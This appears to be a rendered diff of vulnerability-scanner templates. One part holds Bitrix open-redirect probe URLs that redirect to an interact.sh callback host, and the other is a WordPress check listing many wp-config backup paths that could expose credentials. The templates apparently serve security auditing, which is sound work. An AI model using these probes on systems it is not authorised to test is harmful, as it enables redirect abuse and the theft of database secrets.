- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh' - '/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/redirect.php?goto=https://example.com%252F:123@interactsh.com/' - '/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://interact.sh'
- '{{BaseURL}}/bitrix/tools/track_mail_click.php?url=http://site%252F@interactsh.com/' - '/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
- '/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://interact.sh'
- '/bitrix/redirect.php?goto=https://example.com%252F:123@interactsh.com/'
- '/bitrix/tools/track_mail_click.php?url=http://site%252F@interactsh.com/'
stop-at-first-match: true stop-at-first-match: true

63
http/vulnerabilities/wordpress/wordpress-accessible-wpconfig.yaml
View File

@ -16,36 +16,39 @@ info:
http: http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-config.php' - "{{BaseURL}}{{paths}}"
- '{{BaseURL}}/.wp-config.php.swp' payloads:
- '{{BaseURL}}/wp-config-sample.php' paths:
- '{{BaseURL}}/wp-config.inc' - "/wp-config.php"
- '{{BaseURL}}/wp-config.old' - "/.wp-config.php.swp"
- '{{BaseURL}}/wp-config.txt' - "/wp-config-sample.php"
- '{{BaseURL}}/wp-config.php.txt' - "/wp-config.inc"
- '{{BaseURL}}/wp-config.php.bak' - "/wp-config.old"
- '{{BaseURL}}/wp-config.php.BAK' - "/wp-config.txt"
- '{{BaseURL}}/wp-config.php.old' - "/wp-config.php.txt"
- '{{BaseURL}}/wp-config.php.OLD' - "/wp-config.php.bak"
- '{{BaseURL}}/wp-config.php.dist' - "/wp-config.php.BAK"
- '{{BaseURL}}/wp-config.php.inc' - "/wp-config.php.old"
- '{{BaseURL}}/wp-config.php.swp' - "/wp-config.php.OLD"
- '{{BaseURL}}/wp-config.php.html' - "/wp-config.php.dist"
- '{{BaseURL}}/wp-config-backup.txt' - "/wp-config.php.inc"
- '{{BaseURL}}/wp-config.php.save' - "/wp-config.php.swp"
- '{{BaseURL}}/wp-config.php.SAVE' - "/wp-config.php.html"
- '{{BaseURL}}/wp-config.php~' - "/wp-config-backup.txt"
- '{{BaseURL}}/wp-config.php-backup' - "/wp-config.php.save"
- '{{BaseURL}}/wp-config.php.orig' - "/wp-config.php.SAVE"
- '{{BaseURL}}/wp-config.php_orig' - "/wp-config.php~"
- '{{BaseURL}}/wp-config.php.original' - "/wp-config.php-backup"
- '{{BaseURL}}/wp-config.backup' - "/wp-config.php.orig"
- '{{BaseURL}}/_wpeprivate/config.json' - "/wp-config.php_orig"
- '{{BaseURL}}/config.php.zip' - "/wp-config.php.original"
- '{{BaseURL}}/config.php.tar.gz' - "/wp-config.backup"
- '{{BaseURL}}/config.php.new' - "/_wpeprivate/config.json"
- '{{BaseURL}}/common/config.php.new' - "/config.php.zip"
- '{{BaseURL}}/wp-config.php.bk' - "/config.php.tar.gz"
- "/config.php.new"
- "/common/config.php.new"
- "/wp-config.php.bk"
stop-at-first-match: true stop-at-first-match: true